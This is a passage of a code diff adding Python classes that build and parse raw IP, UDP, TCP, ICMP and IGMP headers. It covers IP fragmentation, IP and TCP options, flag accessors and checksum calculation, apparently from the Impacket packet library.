+ my_not = 0xFFFF ^ 0x8000
+ tmp_value &= my_not
+ self.set_ip_off(tmp_value)
+
+ def get_ip_df(self):
+ return self.get_ip_off() & 0x4000
+
+ def set_ip_df(self, aValue):
+ tmp_value = self.get_ip_off()
+ if aValue:
+ tmp_value |= 0x4000
+ else:
+ my_not = 0xFFFF ^ 0x4000
+ tmp_value &= my_not
+ self.set_ip_off(tmp_value)
+
+ def get_ip_mf(self):
+ return self.get_ip_off() & 0x2000
+
+ def set_ip_mf(self, aValue):
+ tmp_value = self.get_ip_off()
+ if aValue:
+ tmp_value |= 0x2000
+ else:
+ my_not = 0xFFFF ^ 0x2000
+ tmp_value &= my_not
+ self.set_ip_off(tmp_value)
+
+
+ def fragment_by_list(self, aList):
+ if self.child():
+ proto = self.child().protocol
+ else:
+ proto = 0
+
+ child_data = self.get_data_as_string()
+ if not child_data:
+ return [self]
+
+ ip_header_bytes = self.get_bytes()
+ current_offset = 0
+ fragment_list = []
+
+ for frag_size in aList:
+ ip = IP()
+ ip.set_bytes(ip_header_bytes) # copy of original header
+ ip.set_ip_p(proto)
+
+
+ if frag_size % 8: # round this fragment size up to next multiple of 8
+ frag_size += 8 - (frag_size % 8)
+
+
+ ip.set_ip_offmask(current_offset // 8)
+ current_offset += frag_size
+
+ data = Data(child_data[:frag_size])
+ child_data = child_data[frag_size:]
+
+ ip.set_ip_len(20 + data.get_size())
+ ip.contains(data)
+
+
+ if child_data:
+
+ ip.set_ip_mf(1)
+
+ fragment_list.append(ip)
+ else: # no more data bytes left to add to fragments
+
+ ip.set_ip_mf(0)
+
+ fragment_list.append(ip)
+ return fragment_list
+
+ if child_data: # any remaining data?
+ # create a fragment containing all of the remaining child_data
+ ip = IP()
+ ip.set_bytes(ip_header_bytes)
+ ip.set_ip_offmask(current_offset)
+ ip.set_ip_len(20 + len(child_data))
+ data = Data(child_data)
+ ip.contains(data)
+ fragment_list.append(ip)
+
+ return fragment_list
+
+
+ def fragment_by_size(self, aSize):
+ data_len = len(self.get_data_as_string())
+ num_frags = data_len // aSize
+
+ if data_len % aSize:
+ num_frags += 1
+
+ size_list = []
+ for i in range(0, num_frags):
+ size_list.append(aSize)
+ return self.fragment_by_list(size_list)
+
+
+ def get_ip_ttl(self):
+ return self.get_byte(8)
+ def set_ip_ttl(self, value):
+ self.set_byte(8, value)
+
+ def get_ip_p(self):
+ return self.get_byte(9)
+
+ def set_ip_p(self, value):
+ self.set_byte(9, value)
+
+ def get_ip_sum(self):
+ return self.get_word(10)
+ def set_ip_sum(self, value):
+ self.auto_checksum = 0
+ self.set_word(10, value)
+
+ def reset_ip_sum(self):
+ self.set_ip_sum(0x0000)
+ self.auto_checksum = 1
+
+ def get_ip_src(self):
+ return self.get_ip_address(12)
+ def set_ip_src(self, value):
+ self.set_ip_address(12, value)
+
+ def get_ip_dst(self):
+ return self.get_ip_address(16)
+
+ def set_ip_dst(self, value):
+ self.set_ip_address(16, value)
+
+ def get_header_size(self):
+ op_len = 0
+ for op in self.__option_list:
+ op_len += op.get_len()
+
+ num_pad = (4 - (op_len % 4)) % 4
+
+ return 20 + op_len + num_pad
+
+ def load_header(self, aBuffer):
+ self.set_bytes_from_string(aBuffer[:20])
+ opt_left = (self.get_ip_hl() - 5) * 4
+ opt_bytes = array.array('B', aBuffer[20:(20 + opt_left)])
+ if len(opt_bytes) != opt_left:
+ raise ImpactPacketException("Cannot load options from truncated packet")
+
+
+ while opt_left:
+ op_type = opt_bytes[0]
+ if op_type == IPOption.IPOPT_EOL or op_type == IPOption.IPOPT_NOP:
+ new_option = IPOption(op_type)
+ op_len = 1
+ else:
+ op_len = opt_bytes[1]
+ if op_len > len(opt_bytes):
+ raise ImpactPacketException("IP Option length is too high")
+
+ new_option = IPOption(op_type, op_len)
+ new_option.set_bytes(opt_bytes[:op_len])
+
+ opt_bytes = opt_bytes[op_len:]
+ opt_left -= op_len
+ self.add_option(new_option)
+ if op_type == IPOption.IPOPT_EOL:
+ break
+
+
+ def __str__(self):
+ flags = ' '
+ if self.get_ip_df():
+ flags += 'DF '
+ if self.get_ip_mf():
+ flags += 'MF '
+ if self.get_ip_rf():
+ flags += 'RF '
+ tmp_str = 'IP%s%s -> %s ' % (flags, self.get_ip_src(),self.get_ip_dst())
+ for op in self.__option_list:
+ tmp_str += '\n' + str(op)
+ if self.child():
+ tmp_str += '\n' + str(self.child())
+ return tmp_str
+
+
+class IPOption(PacketBuffer):
+ IPOPT_EOL = 0
+ IPOPT_NOP = 1
+ IPOPT_RR = 7
+ IPOPT_TS = 68
+ IPOPT_LSRR = 131
+ IPOPT_SSRR = 137
+
+ def __init__(self, opcode = 0, size = None):
+ if size and (size < 3 or size > 40):
+ raise ImpactPacketException("IP Options must have a size between 3 and 40 bytes")
+
+ if(opcode == IPOption.IPOPT_EOL):
+ PacketBuffer.__init__(self, 1)
+ self.set_code(IPOption.IPOPT_EOL)
+ elif(opcode == IPOption.IPOPT_NOP):
+ PacketBuffer.__init__(self, 1)
+ self.set_code(IPOption.IPOPT_NOP)
+ elif(opcode == IPOption.IPOPT_RR):
+ if not size:
+ size = 39
+ PacketBuffer.__init__(self, size)
+ self.set_code(IPOption.IPOPT_RR)
+ self.set_len(size)
+ self.set_ptr(4)
+
+ elif(opcode == IPOption.IPOPT_LSRR):
+ if not size:
+ size = 39
+ PacketBuffer.__init__(self, size)
+ self.set_code(IPOption.IPOPT_LSRR)
+ self.set_len(size)
+ self.set_ptr(4)
+
+ elif(opcode == IPOption.IPOPT_SSRR):
+ if not size:
+ size = 39
+ PacketBuffer.__init__(self, size)
+ self.set_code(IPOption.IPOPT_SSRR)
+ self.set_len(size)
+ self.set_ptr(4)
+
+ elif(opcode == IPOption.IPOPT_TS):
+ if not size:
+ size = 40
+ PacketBuffer.__init__(self, size)
+ self.set_code(IPOption.IPOPT_TS)
+ self.set_len(size)
+ self.set_ptr(5)
+ self.set_flags(0)
+ else:
+ if not size:
+ raise ImpactPacketException("Size required for this type")
+ PacketBuffer.__init__(self,size)
+ self.set_code(opcode)
+ self.set_len(size)
+
+
+ def append_ip(self, ip):
+ op = self.get_code()
+ if not (op == IPOption.IPOPT_RR or op == IPOption.IPOPT_LSRR or op == IPOption.IPOPT_SSRR or op == IPOption.IPOPT_TS):
+ raise ImpactPacketException("append_ip() not support for option type %d" % self.opt_type)
+
+ p = self.get_ptr()
+ if not p:
+ raise ImpactPacketException("append_ip() failed, option ptr uninitialized")
+
+ if (p + 4) > self.get_len():
+ raise ImpactPacketException("append_ip() would overflow option")
+
+ self.set_ip_address(p - 1, ip)
+ p += 4
+ self.set_ptr(p)
+
+
+ def set_code(self, value):
+ self.set_byte(0, value)
+
+ def get_code(self):
+ return self.get_byte(0)
+
+
+ def set_flags(self, flags):
+ if not (self.get_code() == IPOption.IPOPT_TS):
+ raise ImpactPacketException("Operation only supported on Timestamp option")
+ self.set_byte(3, flags)
+
+ def get_flags(self, flags):
+ if not (self.get_code() == IPOption.IPOPT_TS):
+ raise ImpactPacketException("Operation only supported on Timestamp option")
+ return self.get_byte(3)
+
+
+ def set_len(self, len):
+ self.set_byte(1, len)
+
+
+ def set_ptr(self, ptr):
+ self.set_byte(2, ptr)
+
+ def get_ptr(self):
+ return self.get_byte(2)
+
+ def get_len(self):
+ return len(self.get_bytes())
+
+
+ def __str__(self):
+ map = {IPOption.IPOPT_EOL : "End of List ",
+ IPOption.IPOPT_NOP : "No Operation ",
+ IPOption.IPOPT_RR : "Record Route ",
+ IPOption.IPOPT_TS : "Timestamp ",
+ IPOption.IPOPT_LSRR : "Loose Source Route ",
+ IPOption.IPOPT_SSRR : "Strict Source Route "}
+
+ tmp_str = "\tIP Option: "
+ op = self.get_code()
+ if op in map:
+ tmp_str += map[op]
+ else:
+ tmp_str += "Code: %d " % op
+
+ if op == IPOption.IPOPT_RR or op == IPOption.IPOPT_LSRR or op ==IPOption.IPOPT_SSRR:
+ tmp_str += self.print_addresses()
+
+
+ return tmp_str
+
+
+ def print_addresses(self):
+ p = 3
+ tmp_str = "["
+ if self.get_len() >= 7: # at least one complete IP address
+ while 1:
+ if p + 1 == self.get_ptr():
+ tmp_str += "#"
+ tmp_str += self.get_ip_address(p)
+ p += 4
+ if p >= self.get_len():
+ break
+ else:
+ tmp_str += ", "
+ tmp_str += "] "
+ if self.get_ptr() % 4: # ptr field should be a multiple of 4
+ tmp_str += "nonsense ptr field: %d " % self.get_ptr()
+ return tmp_str
+
+
+class UDP(Header):
+ protocol = 17
+ def __init__(self, aBuffer = None):
+ Header.__init__(self, 8)
+ if(aBuffer):
+ self.load_header(aBuffer)
+
+ def get_uh_sport(self):
+ return self.get_word(0)
+ def set_uh_sport(self, value):
+ self.set_word(0, value)
+
+ def get_uh_dport(self):
+ return self.get_word(2)
+ def set_uh_dport(self, value):
+ self.set_word(2, value)
+
+ def get_uh_ulen(self):
+ return self.get_word(4)
+
+ def set_uh_ulen(self, value):
+ self.set_word(4, value)
+
+ def get_uh_sum(self):
+ return self.get_word(6)
+
+ def set_uh_sum(self, value):
+ self.set_word(6, value)
+ self.auto_checksum = 0
+
+ def calculate_checksum(self):
+ if self.auto_checksum and (not self.get_uh_sum()):
+ # if there isn't a parent to grab a pseudo-header from we'll assume the user knows what they're doing
+ # and won't meddle with the checksum or throw an exception
+ if not self.parent():
+ return
+
+ buffer = self.parent().get_pseudo_header()
+
+ buffer += self.get_bytes()
+ data = self.get_data_as_string()
+ if(data):
+ buffer.fromstring(data)
+ self.set_uh_sum(self.compute_checksum(buffer))
+
+ def get_header_size(self):
+ return 8
+
+ def __str__(self):
+ tmp_str = 'UDP %d -> %d' % (self.get_uh_sport(), self.get_uh_dport())
+ if self.child():
+ tmp_str += '\n' + str(self.child())
+ return tmp_str
+
+ def get_packet(self):
+ # set total length
+ if(self.get_uh_ulen() == 0):
+ self.set_uh_ulen(self.get_size())
+ return Header.get_packet(self)
+
+class TCP(Header):
+ protocol = 6
+ TCP_FLAGS_MASK = 0x00FF # lowest 16 bits are the flags
+ def __init__(self, aBuffer = None):
+ Header.__init__(self, 20)
+ self.set_th_off(5)
+ self.__option_list = []
+ if aBuffer:
+ self.load_header(aBuffer)
+
+ def add_option(self, option):
+ self.__option_list.append(option)
+
+ sum = 0
+ for op in self.__option_list:
+ sum += op.get_size()
+
+ if sum > 40:
+ raise ImpactPacketException("Cannot add TCP option, would overflow option space")
+
+ def get_options(self):
+ return self.__option_list
+
+ def swapSourceAndDestination(self):
+ oldSource = self.get_th_sport()
+ self.set_th_sport(self.get_th_dport())
+ self.set_th_dport(oldSource)
+
+ #
+ # Header field accessors
+ #
+
+ def set_th_sport(self, aValue):
+ self.set_word(0, aValue)
+
+ def get_th_sport(self):
+ return self.get_word(0)
+
+ def get_th_dport(self):
+ return self.get_word(2)
+
+ def set_th_dport(self, aValue):
+ self.set_word(2, aValue)
+
+ def get_th_seq(self):
+ return self.get_long(4)
+
+ def set_th_seq(self, aValue):
+ self.set_long(4, aValue)
+
+ def get_th_ack(self):
+ return self.get_long(8)
+
+ def set_th_ack(self, aValue):
+ self.set_long(8, aValue)
+
+ def get_th_flags(self):
+ return self.get_word(12) & self.TCP_FLAGS_MASK
+
+ def set_th_flags(self, aValue):
+ masked = self.get_word(12) & (~self.TCP_FLAGS_MASK)
+ nb = masked | (aValue & self.TCP_FLAGS_MASK)
+ return self.set_word(12, nb, ">")
+
+ def get_th_win(self):
+ return self.get_word(14)
+
+ def set_th_win(self, aValue):
+ self.set_word(14, aValue)
+
+ def set_th_sum(self, aValue):
+ self.set_word(16, aValue)
+ self.auto_checksum = 0
+
+ def get_th_sum(self):
+ return self.get_word(16)
+
+ def get_th_urp(self):
+ return self.get_word(18)
+
+ def set_th_urp(self, aValue):
+ return self.set_word(18, aValue)
+
+ # Flag accessors
+
+ def get_th_reserved(self):
+ tmp_value = self.get_byte(12) & 0x0f
+ return tmp_value
+
+
+ def get_th_off(self):
+ tmp_value = self.get_byte(12) >> 4
+ return tmp_value
+
+ def set_th_off(self, aValue):
+ mask = 0xF0
+ masked = self.get_byte(12) & (~mask)
+ nb = masked | ( (aValue << 4) & mask)
+ return self.set_byte(12, nb)
+
+ def get_CWR(self):
+ return self.get_flag(128)
+ def set_CWR(self):
+ return self.set_flags(128)
+ def reset_CWR(self):
+ return self.reset_flags(128)
+
+ def get_ECE(self):
+ return self.get_flag(64)
+ def set_ECE(self):
+ return self.set_flags(64)
+ def reset_ECE(self):
+ return self.reset_flags(64)
+
+ def get_URG(self):
+ return self.get_flag(32)
+ def set_URG(self):
+ return self.set_flags(32)
+ def reset_URG(self):
+ return self.reset_flags(32)
+
+ def get_ACK(self):
+ return self.get_flag(16)
+ def set_ACK(self):
+ return self.set_flags(16)
+ def reset_ACK(self):
+ return self.reset_flags(16)
+
+ def get_PSH(self):
+ return self.get_flag(8)
+ def set_PSH(self):
+ return self.set_flags(8)
+ def reset_PSH(self):
+ return self.reset_flags(8)
+
+ def get_RST(self):
+ return self.get_flag(4)
+ def set_RST(self):
+ return self.set_flags(4)
+ def reset_RST(self):
+ return self.reset_flags(4)
+
+ def get_SYN(self):
+ return self.get_flag(2)
+ def set_SYN(self):
+ return self.set_flags(2)
+ def reset_SYN(self):
+ return self.reset_flags(2)
+
+ def get_FIN(self):
+ return self.get_flag(1)
+ def set_FIN(self):
+ return self.set_flags(1)
+ def reset_FIN(self):
+ return self.reset_flags(1)
+
+ # Overridden Methods
+
+ def get_header_size(self):
+ return 20 + len(self.get_padded_options())
+
+ def calculate_checksum(self):
+ if not self.auto_checksum or not self.parent():
+ return
+
+ self.set_th_sum(0)
+ buffer = self.parent().get_pseudo_header()
+ buffer += self.get_bytes()
+ buffer += self.get_padded_options()
+
+ data = self.get_data_as_string()
+ if(data):
+ buffer.fromstring(data)
+
+ res = self.compute_checksum(buffer)
+
+ self.set_th_sum(self.compute_checksum(buffer))
+
+ def get_packet(self):
+ "Returns entire packet including child data as a string. This is the function used to extract the final packet"
+
+ # only change th_off value if options are present
+ if len(self.__option_list):
+ self.set_th_off(self.get_header_size() // 4)
+
+ self.calculate_checksum()
+
+ bytes = self.get_bytes() + self.get_padded_options()
+ data = self.get_data_as_string()
+
+ if data:
+ return bytes.tostring() + data
+ else:
+ return bytes.tostring()
+
+ def load_header(self, aBuffer):
+ self.set_bytes_from_string(aBuffer[:20])
+ opt_left = (self.get_th_off() - 5) * 4
+ opt_bytes = array.array('B', aBuffer[20:(20 + opt_left)])
+ if len(opt_bytes) != opt_left:
+ raise ImpactPacketException("Cannot load options from truncated packet")
+
+ while opt_left:
+ op_kind = opt_bytes[0]
+ if op_kind == TCPOption.TCPOPT_EOL or op_kind == TCPOption.TCPOPT_NOP:
+ new_option = TCPOption(op_kind)
+ op_len = 1
+ else:
+ op_len = opt_bytes[1]
+ if op_len > len(opt_bytes):
+ raise ImpactPacketException("TCP Option length is too high")
+ if op_len < 2:
+ raise ImpactPacketException("TCP Option length is too low")
+
+ new_option = TCPOption(op_kind)
+ new_option.set_bytes(opt_bytes[:op_len])
+
+ opt_bytes = opt_bytes[op_len:]
+ opt_left -= op_len
+ self.add_option(new_option)
+ if op_kind == TCPOption.TCPOPT_EOL:
+ break
+
+ #
+ # Private
+ #
+
+ def get_flag(self, bit):
+ if self.get_th_flags() & bit:
+ return 1
+ else:
+ return 0
+
+ def reset_flags(self, aValue):
+ tmp_value = self.get_th_flags() & (~aValue)
+ return self.set_th_flags(tmp_value)
+
+ def set_flags(self, aValue):
+ tmp_value = self.get_th_flags() | aValue
+ return self.set_th_flags(tmp_value)
+
+ def get_padded_options(self):
+ "Return an array containing all options padded to a 4 byte boundary"
+ op_buf = array.array('B')
+ for op in self.__option_list:
+ op_buf += op.get_bytes()
+ num_pad = (4 - (len(op_buf) % 4)) % 4
+ if num_pad:
+ op_buf.fromstring("\0" * num_pad)
+ return op_buf
+
+ def __str__(self):
+ tmp_str = 'TCP '
+ if self.get_ECE():
+ tmp_str += 'ece '
+ if self.get_CWR():
+ tmp_str += 'cwr '
+ if self.get_ACK():
+ tmp_str += 'ack '
+ if self.get_FIN():
+ tmp_str += 'fin '
+ if self.get_PSH():
+ tmp_str += 'push '
+ if self.get_RST():
+ tmp_str += 'rst '
+ if self.get_SYN():
+ tmp_str += 'syn '
+ if self.get_URG():
+ tmp_str += 'urg '
+ tmp_str += '%d -> %d' % (self.get_th_sport(), self.get_th_dport())
+ for op in self.__option_list:
+ tmp_str += '\n' + str(op)
+
+ if self.child():
+ tmp_str += '\n' + str(self.child())
+ return tmp_str
+
+
+class TCPOption(PacketBuffer):
+ TCPOPT_EOL = 0
+ TCPOPT_NOP = 1
+ TCPOPT_MAXSEG = 2
+ TCPOPT_WINDOW = 3
+ TCPOPT_SACK_PERMITTED = 4
+ TCPOPT_SACK = 5
+ TCPOPT_TIMESTAMP = 8
+ TCPOPT_SIGNATURE = 19
+
+
+ def __init__(self, kind, data = None):
+
+ if kind == TCPOption.TCPOPT_EOL:
+ PacketBuffer.__init__(self, 1)
+ self.set_kind(TCPOption.TCPOPT_EOL)
+ elif kind == TCPOption.TCPOPT_NOP:
+ PacketBuffer.__init__(self, 1)
+ self.set_kind(TCPOption.TCPOPT_NOP)
+ elif kind == TCPOption.TCPOPT_MAXSEG:
+ PacketBuffer.__init__(self, 4)
+ self.set_kind(TCPOption.TCPOPT_MAXSEG)
+ self.set_len(4)
+ if data:
+ self.set_mss(data)
+ else:
+ self.set_mss(512)
+ elif kind == TCPOption.TCPOPT_WINDOW:
+ PacketBuffer.__init__(self, 3)
+ self.set_kind(TCPOption.TCPOPT_WINDOW)
+ self.set_len(3)
+ if data:
+ self.set_shift_cnt(data)
+ else:
+ self.set_shift_cnt(0)
+ elif kind == TCPOption.TCPOPT_TIMESTAMP:
+ PacketBuffer.__init__(self, 10)
+ self.set_kind(TCPOption.TCPOPT_TIMESTAMP)
+ self.set_len(10)
+ if data:
+ self.set_ts(data)
+ else:
+ self.set_ts(0)
+ elif kind == TCPOption.TCPOPT_SACK_PERMITTED:
+ PacketBuffer.__init__(self, 2)
+ self.set_kind(TCPOption.TCPOPT_SACK_PERMITTED)
+ self.set_len(2)
+
+ elif kind == TCPOption.TCPOPT_SACK:
+ PacketBuffer.__init__(self, 2)
+ self.set_kind(TCPOption.TCPOPT_SACK)
+
+ def set_left_edge(self, aValue):
+ self.set_long (2, aValue)
+
+ def set_right_edge(self, aValue):
+ self.set_long (6, aValue)
+
+ def set_kind(self, kind):
+ self.set_byte(0, kind)
+
+
+ def get_kind(self):
+ return self.get_byte(0)
+
+
+ def set_len(self, len):
+ if self.get_size() < 2:
+ raise ImpactPacketException("Cannot set length field on an option having a size smaller than 2 bytes")
+ self.set_byte(1, len)
+
+ def get_len(self):
+ if self.get_size() < 2:
+ raise ImpactPacketException("Cannot retrieve length field from an option having a size smaller than 2 bytes")
+ return self.get_byte(1)
+
+ def get_size(self):
+ return len(self.get_bytes())
+
+
+ def set_mss(self, len):
+ if self.get_kind() != TCPOption.TCPOPT_MAXSEG:
+ raise ImpactPacketException("Can only set MSS on TCPOPT_MAXSEG option")
+ self.set_word(2, len)
+
+ def get_mss(self):
+ if self.get_kind() != TCPOption.TCPOPT_MAXSEG:
+ raise ImpactPacketException("Can only retrieve MSS from TCPOPT_MAXSEG option")
+ return self.get_word(2)
+
+ def set_shift_cnt(self, cnt):
+ if self.get_kind() != TCPOption.TCPOPT_WINDOW:
+ raise ImpactPacketException("Can only set Shift Count on TCPOPT_WINDOW option")
+ self.set_byte(2, cnt)
+
+ def get_shift_cnt(self):
+ if self.get_kind() != TCPOption.TCPOPT_WINDOW:
+ raise ImpactPacketException("Can only retrieve Shift Count from TCPOPT_WINDOW option")
+ return self.get_byte(2)
+
+ def get_ts(self):
+ if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP:
+ raise ImpactPacketException("Can only retrieve timestamp from TCPOPT_TIMESTAMP option")
+ return self.get_long(2)
+
+ def set_ts(self, ts):
+ if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP:
+ raise ImpactPacketException("Can only set timestamp on TCPOPT_TIMESTAMP option")
+ self.set_long(2, ts)
+
+ def get_ts_echo(self):
+ if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP:
+ raise ImpactPacketException("Can only retrieve timestamp from TCPOPT_TIMESTAMP option")
+ return self.get_long(6)
+
+ def set_ts_echo(self, ts):
+ if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP:
+ raise ImpactPacketException("Can only set timestamp on TCPOPT_TIMESTAMP option")
+ self.set_long(6, ts)
+
+ def __str__(self):
+ map = { TCPOption.TCPOPT_EOL : "End of List ",
+ TCPOption.TCPOPT_NOP : "No Operation ",
+ TCPOption.TCPOPT_MAXSEG : "Maximum Segment Size ",
+ TCPOption.TCPOPT_WINDOW : "Window Scale ",
+ TCPOption.TCPOPT_TIMESTAMP : "Timestamp " }
+
+ tmp_str = "\tTCP Option: "
+ op = self.get_kind()
+ if op in map:
+ tmp_str += map[op]
+ else:
+ tmp_str += " kind: %d " % op
+ if op == TCPOption.TCPOPT_MAXSEG:
+ tmp_str += " MSS : %d " % self.get_mss()
+ elif op == TCPOption.TCPOPT_WINDOW:
+ tmp_str += " Shift Count: %d " % self.get_shift_cnt()
+ elif op == TCPOption.TCPOPT_TIMESTAMP:
+ pass # TODO
+ return tmp_str
+
+class ICMP(Header):
+ protocol = 1
+ ICMP_ECHOREPLY = 0
+ ICMP_UNREACH = 3
+ ICMP_UNREACH_NET = 0
+ ICMP_UNREACH_HOST = 1
+ ICMP_UNREACH_PROTOCOL = 2
+ ICMP_UNREACH_PORT = 3
+ ICMP_UNREACH_NEEDFRAG = 4
+ ICMP_UNREACH_SRCFAIL = 5
+ ICMP_UNREACH_NET_UNKNOWN = 6
+ ICMP_UNREACH_HOST_UNKNOWN = 7
+ ICMP_UNREACH_ISOLATED = 8
+ ICMP_UNREACH_NET_PROHIB = 9
+ ICMP_UNREACH_HOST_PROHIB = 10
+ ICMP_UNREACH_TOSNET = 11
+ ICMP_UNREACH_TOSHOST = 12
+ ICMP_UNREACH_FILTERPROHIB = 13
+ ICMP_UNREACH_HOST_PRECEDENCE = 14
+ ICMP_UNREACH_PRECEDENCE_CUTOFF = 15
+ ICMP_SOURCEQUENCH = 4
+ ICMP_REDIRECT = 5
+ ICMP_REDIRECT_NET = 0
+ ICMP_REDIRECT_HOST = 1
+ ICMP_REDIRECT_TOSNET = 2
+ ICMP_REDIRECT_TOSHOST = 3
+ ICMP_ALTHOSTADDR = 6
+ ICMP_ECHO = 8
+ ICMP_ROUTERADVERT = 9
+ ICMP_ROUTERSOLICIT = 10
+ ICMP_TIMXCEED = 11
+ ICMP_TIMXCEED_INTRANS = 0
+ ICMP_TIMXCEED_REASS = 1
+ ICMP_PARAMPROB = 12
+ ICMP_PARAMPROB_ERRATPTR = 0
+ ICMP_PARAMPROB_OPTABSENT = 1
+ ICMP_PARAMPROB_LENGTH = 2
+ ICMP_TSTAMP = 13
+ ICMP_TSTAMPREPLY = 14
+ ICMP_IREQ = 15
+ ICMP_IREQREPLY = 16
+ ICMP_MASKREQ = 17
+ ICMP_MASKREPLY = 18
+
+ def __init__(self, aBuffer = None):
+ Header.__init__(self, 8)
+ if aBuffer:
+ self.load_header(aBuffer)
+
+ def get_header_size(self):
+ anamolies = { ICMP.ICMP_TSTAMP : 20, ICMP.ICMP_TSTAMPREPLY : 20, ICMP.ICMP_MASKREQ : 12, ICMP.ICMP_MASKREPLY : 12 }
+ if self.get_icmp_type() in anamolies:
+ return anamolies[self.get_icmp_type()]
+ else:
+ return 8
+
+ def get_icmp_type(self):
+ return self.get_byte(0)
+
+ def set_icmp_type(self, aValue):
+ self.set_byte(0, aValue)
+
+ def get_icmp_code(self):
+ return self.get_byte(1)
+
+ def set_icmp_code(self, aValue):
+ self.set_byte(1, aValue)
+
+ def get_icmp_cksum(self):
+ return self.get_word(2)
+
+ def set_icmp_cksum(self, aValue):
+ self.set_word(2, aValue)
+ self.auto_checksum = 0
+
+ def get_icmp_gwaddr(self):
+ return self.get_ip_address(4)
+
+ def set_icmp_gwaddr(self, ip):
+ self.set_ip_address(4, ip)
+
+ def get_icmp_id(self):
+ return self.get_word(4)
+
+ def set_icmp_id(self, aValue):
+ self.set_word(4, aValue)
+
+ def get_icmp_seq(self):
+ return self.get_word(6)
+
+ def set_icmp_seq(self, aValue):
+ self.set_word(6, aValue)
+
+ def get_icmp_void(self):
+ return self.get_long(4)
+
+ def set_icmp_void(self, aValue):
+ self.set_long(4, aValue)
+
+
+ def get_icmp_nextmtu(self):
+ return self.get_word(6)
+
+ def set_icmp_nextmtu(self, aValue):
+ self.set_word(6, aValue)
+
+ def get_icmp_num_addrs(self):
+ return self.get_byte(4)
+
+ def set_icmp_num_addrs(self, aValue):
+ self.set_byte(4, aValue)
+
+ def get_icmp_wpa(self):
+ return self.get_byte(5)
+
+ def set_icmp_wpa(self, aValue):
+ self.set_byte(5, aValue)
+
+ def get_icmp_lifetime(self):
+ return self.get_word(6)
+
+ def set_icmp_lifetime(self, aValue):
+ self.set_word(6, aValue)
+
+ def get_icmp_otime(self):
+ return self.get_long(8)
+
+ def set_icmp_otime(self, aValue):
+ self.set_long(8, aValue)
+
+ def get_icmp_rtime(self):
+ return self.get_long(12)
+
+ def set_icmp_rtime(self, aValue):
+ self.set_long(12, aValue)
+
+ def get_icmp_ttime(self):
+ return self.get_long(16)
+
+ def set_icmp_ttime(self, aValue):
+ self.set_long(16, aValue)
+
+ def get_icmp_mask(self):
+ return self.get_ip_address(8)
+
+ def set_icmp_mask(self, mask):
+ self.set_ip_address(8, mask)
+
+
+ def calculate_checksum(self):
+ if self.auto_checksum and (not self.get_icmp_cksum()):
+ buffer = self.get_buffer_as_string()
+ data = self.get_data_as_string()
+ if data:
+ buffer += data
+
+ tmp_array = array.array('B', buffer)
+ self.set_icmp_cksum(self.compute_checksum(tmp_array))
+
+ def get_type_name(self, aType):
+ tmp_type = {0:'ECHOREPLY', 3:'UNREACH', 4:'SOURCEQUENCH',5:'REDIRECT', 6:'ALTHOSTADDR', 8:'ECHO', 9:'ROUTERADVERT', 10:'ROUTERSOLICIT', 11:'TIMXCEED', 12:'PARAMPROB', 13:'TSTAMP', 14:'TSTAMPREPLY', 15:'IREQ', 16:'IREQREPLY', 17:'MASKREQ', 18:'MASKREPLY', 30:'TRACEROUTE', 31:'DATACONVERR', 32:'MOBILE REDIRECT', 33:'IPV6 WHEREAREYOU', 34:'IPV6 IAMHERE', 35:'MOBILE REGREQUEST', 36:'MOBILE REGREPLY', 39:'SKIP', 40:'PHOTURIS'}
+ answer = tmp_type.get(aType, 'UNKNOWN')
+ return answer
+
+ def get_code_name(self, aType, aCode):
+ tmp_code = {3:['UNREACH NET', 'UNREACH HOST', 'UNREACH PROTOCOL', 'UNREACH PORT', 'UNREACH NEEDFRAG', 'UNREACH SRCFAIL', 'UNREACH NET UNKNOWN', 'UNREACH HOST UNKNOWN', 'UNREACH ISOLATED', 'UNREACH NET PROHIB', 'UNREACH HOST PROHIB', 'UNREACH TOSNET', 'UNREACH TOSHOST', 'UNREACH FILTER PROHIB', 'UNREACH HOST PRECEDENCE', 'UNREACH PRECEDENCE CUTOFF', 'UNKNOWN ICMP UNREACH']}
+ tmp_code[5] = ['REDIRECT NET', 'REDIRECT HOST', 'REDIRECT TOSNET', 'REDIRECT TOSHOST']
+ tmp_code[9] = ['ROUTERADVERT NORMAL', None, None, None, None, None, None, None, None, None, None, None, None, None, None, None,'ROUTERADVERT NOROUTE COMMON']
+ tmp_code[11] = ['TIMXCEED INTRANS ', 'TIMXCEED REASS']
+ tmp_code[12] = ['PARAMPROB ERRATPTR ', 'PARAMPROB OPTABSENT', 'PARAMPROB LENGTH']
+ tmp_code[40] = [None, 'PHOTURIS UNKNOWN INDEX', 'PHOTURIS AUTH FAILED', 'PHOTURIS DECRYPT FAILED']
+ if aType in tmp_code:
+ tmp_list = tmp_code[aType]
+ if ((aCode + 1) > len(tmp_list)) or (not tmp_list[aCode]):
+ return 'UNKNOWN'
+ else:
+ return tmp_list[aCode]
+ else:
+ return 'UNKNOWN'
+
+ def __str__(self):
+ tmp_type = self.get_icmp_type()
+ tmp_code = self.get_icmp_code()
+ tmp_str = 'ICMP type: ' + self.get_type_name(tmp_type)
+ tmp_str+= ' code: ' + self.get_code_name(tmp_type, tmp_code)
+ if self.child():
+ tmp_str += '\n' + str( self.child() )
+ return tmp_str
+
+ def isDestinationUnreachable(self):
+ return self.get_icmp_type() == 3
+
+ def isError(self):
+ return not self.isQuery()
+
+ def isHostUnreachable(self):
+ return self.isDestinationUnreachable() and (self.get_icmp_code() == 1)
+
+ def isNetUnreachable(self):
+ return self.isDestinationUnreachable() and (self.get_icmp_code() == 0)
+
+ def isPortUnreachable(self):
+ return self.isDestinationUnreachable() and (self.get_icmp_code() == 3)
+
+ def isProtocolUnreachable(self):
+ return self.isDestinationUnreachable() and (self.get_icmp_code() == 2)
+
+ def isQuery(self):
+ tmp_dict = {8:'', 9:'', 10:'', 13:'', 14:'', 15:'', 16:'', 17:'', 18:''}
+ return self.get_icmp_type() in tmp_dict
+
+class IGMP(Header):
+ protocol = 2
+ def __init__(self, aBuffer = None):
+ Header.__init__(self, 8)
+ if aBuffer:
+ self.load_header(aBuffer)
+
+ def get_igmp_type(self):
+ return self.get_byte(0)
+
+ def set_igmp_type(self, aValue):
+ self.set_byte(0, aValue)
+
+ def get_igmp_code(self):
+ return self.get_byte(1)
+
+ def set_igmp_code(self, aValue):
+ self.set_byte(1, aValue)
+
+ def get_igmp_cksum(self):
+ return self.get_word(2)
+
+ def set_igmp_cksum(self, aValue):
+ self.set_word(2, aValue)
+
